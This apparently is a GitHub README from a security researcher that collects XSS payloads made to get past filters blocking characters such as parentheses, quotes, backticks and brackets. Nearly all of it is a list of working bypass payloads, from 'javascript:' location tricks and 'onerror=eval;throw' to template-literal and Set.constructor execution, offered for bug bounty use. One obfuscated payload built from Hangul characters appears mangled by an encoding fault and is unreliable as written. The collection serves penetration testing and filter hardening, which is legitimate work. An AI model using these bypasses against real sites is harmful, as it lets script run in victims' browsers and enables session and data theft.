XSS-Payload-without-Anything
XSS Payload without Anything.
What is XSS Payload without Anything
When I work for a company or bug bounty, the unexpected hurdle is a protection(xss filter) of special char in the JS(Javascript) area. So I am devising a way to easily solve these problems, and one of the processes is this document.
Let's collect a lot of thoughts and solve our problems.
Concept
It is similar to "Payload all the things" in terms of collecting the payload, but I want to provide a list of payloads with special tag (without char, used char, other..) I plan to make it easy to search and to show what characters (or what they are made of) are unusable.
format
without char: () , '
XSS Payload
// usedchar:
// author:
// description:
without char (Frequently filtered characters)
I have selected special characters that are often blocked.
( )
{ }
,
"
'
`
[ ]
\
/
;
+
.
=
(template): () {} , " ' backtick [] \ / ; + . =
Usage
on Github.com
- Ctrl + F >
- find your problem char
- XSS
on hahwul.com comming soon
Awesome payload
coming soon
Archive
without char: () , " backtick \ / [] {} .
location='JaVaScRiPt:prompt'+document.location.hash[1]+'45'+document.location.hash[2]
without char: () {} , " backtick [] / + .
onerror=eval;throw'alert\x2845\x29';
without char: !backtick
prompt`45`
without char: () {} , " backtick``[] / ; + .
location='javaScriPt:alert\x2845\x29'
without char: " backtick \ / ; .
([,ν,,,,ν]=[]+{},[ν,κΈ,ν,μ΄,,λ‘,λ,γ
,,,γ
]=[!!ν]+!ν+ν.γ
)[ν+=ν+γ
+γ
+ν+κΈ+ν+ν+ν+ν+κΈ][ν](λ‘+λ+μ΄+κΈ+ν+'(45)')()
without char: {} , " ' backtick \ / ; + =
[45].some.alert()
without char: () {} , " ' [] \ / ; + =
Set.constructor`alert\x2845\x29`
Submit XSS Payloads
Add issue form or pull Request
XSS Payload:
WithOut:
Description:
or ...
Tweet with me @hahwul